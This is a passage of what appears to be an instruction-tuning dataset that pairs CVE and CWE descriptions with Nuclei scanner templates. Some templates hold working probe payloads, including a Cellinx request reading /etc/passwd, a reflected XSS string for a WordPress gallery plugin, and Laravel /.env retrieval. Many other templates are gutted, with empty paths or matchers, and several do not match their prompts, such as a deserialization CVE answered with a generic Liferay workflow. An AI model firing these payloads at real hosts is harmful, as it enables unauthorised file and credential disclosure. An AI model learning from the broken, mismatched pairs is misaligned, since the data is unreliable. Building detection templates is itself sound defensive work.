/cgi-bin/GetFileContent.cgi.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: cellinx nvt_web_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-23063\n\ninfo:\n name: Cellinx NVT Web Server - Local File Disclosure\n author: daffainfo\n severity: high\n description: Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component /cgi-bin/GetFileContent.cgi.\n tags: cve,cve2023,cellinx,lfi,nvt,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2023-23063"} +{"instruction": "Generate a Nuclei template for CVE-2022-40684", "input": "Title: Authentication Bypass in fortinet fortiproxy and others\nSummary: An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: fortinet fortiproxy, fortinet fortiswitchmanager, fortinet fortios\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-40684\n\ninfo:\n name: Fortinet - Authentication Bypass\n author: Shockwave,nagli,carlosvieira\n severity: critical\n description: Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"ENC XXXX\" \n - \"http_method\" \n part: body_1\n condition: and\n - type: word\n words:\n - \"Invalid SSH public key.\" \n - \"cli_error\" \n part: body_2\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2022-40684"} +{"instruction": "Generate a Nuclei template for CVE-2024-39907", "input": "Title: SQL Injection in fit2cloud 1panel\nSummary: 1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: fit2cloud 1panel\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-39907\n\ninfo:\n name: 1Panel SQL Injection - Authenticated\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: 1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.\n tags: cve,cve2024,sqli,1panel,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-39907"} +{"instruction": "Generate a Nuclei template for CVE-2022-0824", "input": "Title: Vulnerability (CWE-284) in webmin webmin\nSummary: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.\nVulnerability Type: Vulnerability (CWE-284)\nSeverity: high\nAffected Products: webmin webmin\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0824\n\ninfo:\n name: Webmin <1.990 - Improper Access Control\n author: cckuailong\n severity: high\n description: Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n tags: cve,cve2022,rce,oss,huntr,webmin,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"Failed to write to /{{ranstr}}/index.html\" \n part: body", "category": "cve", "severity": "high", "id": "CVE-2022-0824"} +{"instruction": "Generate a Nuclei template for: Disable Comments \u2013 Remove Comments & Stop Spam [Multi-Site Support] Detection", "input": "Title: Disable Comments \u2013 Remove Comments & Stop Spam [Multi-Site Support] Detection\nSummary: Disable Comments \u2013 Remove Comments & Stop Spam [Multi-Site Support] Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-disable-comments\n\ninfo:\n name: Disable Comments \u2013 Remove Comments & Stop Spam [Multi-Site Support] Detection\n author: ricardomaia\n severity: info\n description: Disable Comments \u2013 Remove Comments & Stop Spam [Multi-Site Support] Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-disable-comments"} +{"instruction": "Generate a Nuclei template for CVE-2019-13372", "input": "Title: Code Injection in dlink central_wifimanager\nSummary: /web/Lib/Action/IndexAction.class.php in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 allows remote attackers to execute arbitrary PHP code via a cookie because a cookie's username field allows eval injection, and an empty password bypasses authentication.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: dlink central_wifimanager\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-13372\n\ninfo:\n name: D-Link Central WiFi Manager CWM(100) - Remote Code Execution\n author: DhiyaneshDK\n severity: critical\n description: /web/Lib/Action/IndexAction.class.php in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 allows remote attackers to execute arbitrary PHP code via a cookie because a cookie's username field allows eval injection, and an empty password bypasses authentication.\n tags: cve,cve2019,d-link,wifimanager,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{string}}\" \n - \"/public/css/\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2019-13372"} +{"instruction": "Generate a Nuclei template for CVE-2008-0702", "input": "Title: Buffer Overflow in south_river_technologies titan_ftp_server\nSummary: Multiple heap-based buffer overflows in Titan FTP Server 6.03 and 6.0.5.549 allow remote attackers to cause a denial of service (daemon crash or hang) and possibly execute arbitrary code via a long argument to the (1) USER or (2) PASS command, different vectors than CVE-2004-1641.\nVulnerability Type: Buffer Overflow\nSeverity: high\nAffected Products: south_river_technologies titan_ftp_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2008-0702\n\ninfo:\n name: Titan FTP Server 6.03 and 6.0.5.549 - Heap Overflow via Long Commands\n author: pussycat0x\n severity: critical\n description: Titan FTP Server versions 6.03 and 6.05 (builds) contain multiple heap-based buffer overflow vulnerabilities. Remote attackers can cause denial of service (daemon crash) or potentially execute arbitrary code by sending excessively long USER, PASS, or other FTP commands that trigger heap overflows.\n tags: cve,cve2008,network,ftp,titan-ftp,tcp,passive,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2008-0702"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: veeam-backup-manager-login\n\ninfo:\n name: Veeam Backup Enterprise Manager Login - Detect\n author: Charles D\n severity: info\n description: Veeam Backup Enterprise Manager Login\n tags: veeam,panel,enterprise-manager,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.aspx\" \n matchers:\n - type: word\n words:\n - \"Veeam Backup Enterprise Manager : Login\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2020-7961", "input": "Title: Deserialization of Untrusted Data in liferay liferay_portal\nSummary: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: liferay liferay_portal\nIndicators: error, vulnerability detected", "output": "id: liferay-workflow\n\ninfo:\n name: Liferay Security Checks\n author: dwisiswant0\n severity: info\n description: A simple workflow that runs all liferay related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2020-7961"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Arkose Labs Client API", "input": "Title: Content-Security-Policy Bypass - Arkose Labs Client API\nSummary: Content-Security-Policy Bypass - Arkose Labs Client API\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: arkoselabs-client-api-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Arkose Labs Client API\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Arkose Labs Client API\n tags: xss,csp-bypass,arkoselabs-client-api,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"arkoselabs.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "arkoselabs-client-api-csp-bypass"} +{"instruction": "Generate a Nuclei template for: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read", "input": "Title: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read\nSummary: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read. The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: weaver-sptmforportalthumbnail-lfi\n\ninfo:\n name: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read\n author: SleepingBag945\n severity: high\n description: The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.\n tags: weaver,e-cology,oa,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp\" \n matchers:\n - type: word\n words:\n - \"weaver.general.BaseBean\" \n - \"getServletConfig\" \n part: body\n condition: and\n - type: word\n words:\n - \"image/png\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "weaver-sptmforportalthumbnail-lfi"} +{"instruction": "Generate a Nuclei template for: Halo ITSM - Pre-Authentication SQL Injection", "input": "Title: Halo ITSM - Pre-Authentication SQL Injection\nSummary: Halo ITSM - Pre-Authentication SQL Injection. A Time-Based SQL Injection vulnerability in Halo ITSM allows unauthenticated attackers to execute malicious SQL queries by leveraging time delays, potentially leading to data exfiltration, privilege escalation, or full system compromise.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: halo-tism-sqli\n\ninfo:\n name: Halo ITSM - Pre-Authentication SQL Injection\n author: rootxharsh,iamnoooob,pdresearch\n severity: critical\n description: A Time-Based SQL Injection vulnerability in Halo ITSM allows unauthenticated attackers to execute malicious SQL queries by leveraging time delays, potentially leading to data exfiltration, privilege escalation, or full system compromise.\n tags: halo,itsm,sqli,time-based-sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "critical", "id": "halo-tism-sqli"} +{"instruction": "Generate a Nuclei template for: Apache Hertzbeat - Detect", "input": "Title: Apache Hertzbeat - Detect\nSummary: Apache Hertzbeat - Detect. Detects a Apache Hertzbeat web application is in use, that is a real-time monitoring system with agentless, performance cluster, prometheus-compatible, custom monitoring and status page building capabilities.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: apache-hertzbeat-detect\n\ninfo:\n name: Apache Hertzbeat - Detect\n author: icarot\n severity: info\n description: Detects a Apache Hertzbeat web application is in use, that is a real-time monitoring system with agentless, performance cluster, prometheus-compatible, custom monitoring and status page building capabilities.\n tags: tech,hertzbeat,apache,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/assets/app-data.json\" \n matchers:\n - type: word\n words:\n - \"\"name\": \"HertzBeat\"\" \n - \"hertzbeat.apache.org\" \n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "apache-hertzbeat-detect"} +{"instruction": "Generate a Nuclei template for: Casdoor get-users Account Password Disclosure", "input": "Title: Casdoor get-users Account Password Disclosure\nSummary: Casdoor get-users Account Password Disclosure. Casdoor get-users Account Password is exposed.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: casdoor-users-password\n\ninfo:\n name: Casdoor get-users Account Password Disclosure\n author: DhiyaneshDk\n severity: high\n description: Casdoor get-users Account Password is exposed.\n tags: casdoor,exposure,misconfig,disclosure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/get-users?p=123&pageSize=123\" \n matchers:\n - type: word\n words:\n - \"\"name\":\" \n - \"\"password\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "casdoor-users-password"} +{"instruction": "Generate a Nuclei template for: Caucho Resin LFR", "input": "Title: Caucho Resin LFR\nSummary: Caucho Resin LFR. There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: resin-viewfile-lfr\n\ninfo:\n name: Caucho Resin LFR\n author: princechaddha\n severity: high\n description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files.\n tags: resin,caucho,lfr,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/resin-doc/viewfile/?file=index.jsp\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %\" \n part: body", "category": "generic", "severity": "high", "id": "resin-viewfile-lfr"} +{"instruction": "Generate a Nuclei template for: Elastic HD Dashboard Exposure", "input": "Title: Elastic HD Dashboard Exposure\nSummary: Elastic HD Dashboard Exposure. Elastic HD Dashboard is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: elastic-hd-dashboard\n\ninfo:\n name: Elastic HD Dashboard Exposure\n author: tess\n severity: low\n description: Elastic HD Dashboard is exposed.\n tags: misconfig,exposure,elastic,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Elastic HD Dashboard\" \n - \"elasticsearch go Edition head plugin\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "elastic-hd-dashboard"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Akamai Content", "input": "Title: Content-Security-Policy Bypass - Akamai Content\nSummary: Content-Security-Policy Bypass - Akamai Content. Tags: xss, csp-bypass, akamai-content\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: akamai-content-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Akamai Content\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Akamai Content\n tags: xss,csp-bypass,akamai-content,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"akamai.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "akamai-content-csp-bypass"} +{"instruction": "Generate a Nuclei template for CVE-2023-7028", "input": "Title: Vulnerability (CWE-640) in gitlab gitlab\nSummary: An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\nVulnerability Type: Vulnerability (CWE-640)\nSeverity: critical\nAffected Products: gitlab gitlab\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-7028\n\ninfo:\n name: GitLab - Account Takeover via Password Reset\n author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch\n severity: high\n description: An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: dsl", "category": "cve", "severity": "critical", "id": "CVE-2023-7028"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: grails-database-admin-console\n\ninfo:\n name: Grails Admin Console Panel - Detect\n author: emadshanab\n severity: medium\n description: Grails Admin Console panel was detected.\n tags: grails,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dbconsole/\" \n - \"{{BaseURL}}/h2-console/\" \n matchers:\n - type: word\n words:\n - \"H2 Console\" \n - type: word\n words:\n - \"Sorry, remote connections ('webAllowOthers') are disabled on this server\"", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: New Relic Pixie API Key", "input": "Title: New Relic Pixie API Key\nSummary: New Relic Pixie API Key. Tags: file, keys, newrelic\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: newrelic-pixie-apikey\n\ninfo:\n name: New Relic Pixie API Key\n author: DhiyaneshDK\n severity: info\n description: New Relic Pixie API Key\n tags: file,keys,newrelic,pixie,token\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "newrelic-pixie-apikey"} +{"instruction": "Generate a Nuclei template for CVE-2021-24291", "input": "Title: Cross-Site Scripting (XSS) in 10web photo_gallery\nSummary: The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery WordPress plugin before 1.5.69 was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and _id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: 10web photo_gallery\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24291\n\ninfo:\n name: WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users.\n tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//\" \n matchers:\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: word\n words:\n - \"onmouseover=alert(document.domain)//\" \n - \"wp-content/uploads/photo-gallery\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24291"} +{"instruction": "Generate a Nuclei template for CVE-2023-27292", "input": "Title: Vulnerability (CWE-601) in opencats opencats\nSummary: An open redirect vulnerability exposes OpenCATS to template injection due to improper validation of user-supplied GET parameters.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: opencats opencats\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-27292\n\ninfo:\n name: OpenCATS - Open Redirect\n author: r3Y3r53\n severity: medium\n description: OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n tags: cve2023,cve,authenticated,tenable,opencats,redirect,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Page Preview\" \n - \"\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-27292"} +{"instruction": "Generate a Nuclei template for CVE-2023-33440", "input": "Title: Code Injection in faculty_evaluation_system_project faculty_evaluation_system\nSummary: Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.\nVulnerability Type: Code Injection\nSeverity: high\nAffected Products: faculty_evaluation_system_project faculty_evaluation_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-33440\n\ninfo:\n name: Faculty Evaluation System v1.0 - Remote Code Execution\n author: Harsh\n severity: high\n description: Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.\n tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2023-33440"} +{"instruction": "Generate a Nuclei template for: Doppler SCIM Token", "input": "Title: Doppler SCIM Token\nSummary: Doppler SCIM Token. Tags: doppler, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: doppler-scim-token\n\ninfo:\n name: Doppler SCIM Token\n author: DhiyaneshDK\n severity: info\n description: Doppler SCIM Token\n tags: doppler,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "doppler-scim-token"} +{"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: xss-fuzz\n\ninfo:\n name: Fuzzing Parameters - Cross-Site Scripting\n author: kazet\n severity: medium\n description: Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.\n tags: xss,generic,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?{{xss_param}}\" \n matchers:\n - type: word\n words:\n - \"'>\"Access Denied\" \n - \"You don't have permission to access\" \n part: body\n condition: or", "category": "cwe", "severity": "high", "id": "CWE-79"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: icinga-web-login\n\ninfo:\n name: Icinga Web 2 Login Panel - Detect\n author: dhiyaneshDK\n severity: info\n description: Icinga Web 2 login panel was detected.\n tags: panel,icinga,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/authentication/login\" \n matchers:\n - type: word\n words:\n - \"Icinga Web 2 Login\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: raspberrymatic-panel\n\ninfo:\n name: RaspberryMatic Login Panel - Detect\n author: princechaddha\n severity: info\n description: RaspberryMatic login panel was detected.\n tags: panel,raspberrymatic,iot,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.htm\" \n matchers:\n - type: word\n words:\n - \"RaspberryMatic WebUI\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: emerson-power-panel\n\ninfo:\n name: Emerson Network Power IntelliSlot Web Card Panel - Detect\n author: princechaddha\n severity: info\n description: Emerson Network Power IntelliSlot Web Card panel was detected.\n tags: panel,intellislot,emerson,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Emerson Network Power IntelliSlot Web Card\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: netsurveillance-web\n\ninfo:\n name: NETSurveillance Web Panel - Detect\n author: DhiyaneshDK\n severity: info\n description: NETSurveillance Web panel was detected.\n tags: tech,iot,edb,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Login.htm\" \n matchers:\n - type: word\n words:\n - \"NetSurveillance WEB\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2017-16894", "input": "Title: Information Disclosure in laravel laravel\nSummary: In Laravel framework through 5.5.21, remote attackers can obtain sensitive information (such as externally usable passwords) via a direct request for the /.env URI. NOTE: this CVE is only about Laravel framework's writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting the .env permissions. The .env filename is not used exclusively by Laravel framework.\nVulnerability Type: Information Disclosure\nSeverity: high\nAffected Products: laravel laravel\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-16894\n\ninfo:\n name: Laravel <5.5.21 - Information Disclosure\n author: j4vaovo\n severity: high\n description: Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel.\n tags: cve,cve2017,laravel,exposure,packetstorm,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.env\" \n matchers:\n - type: word\n words:\n - \"APP_NAME=\" \n - \"APP_DEBUG=\" \n - \"DB_PASSWORD=\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/octet-stream\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2017-16894"} +{"instruction": "Generate a Nuclei template for: Titan FTP Service - Detect", "input": "Title: Titan FTP Service - Detect\nSummary: Titan FTP Service - Detect. Titan FTP service was detected.\nVulnerability Type: Security Check\nSeverity: 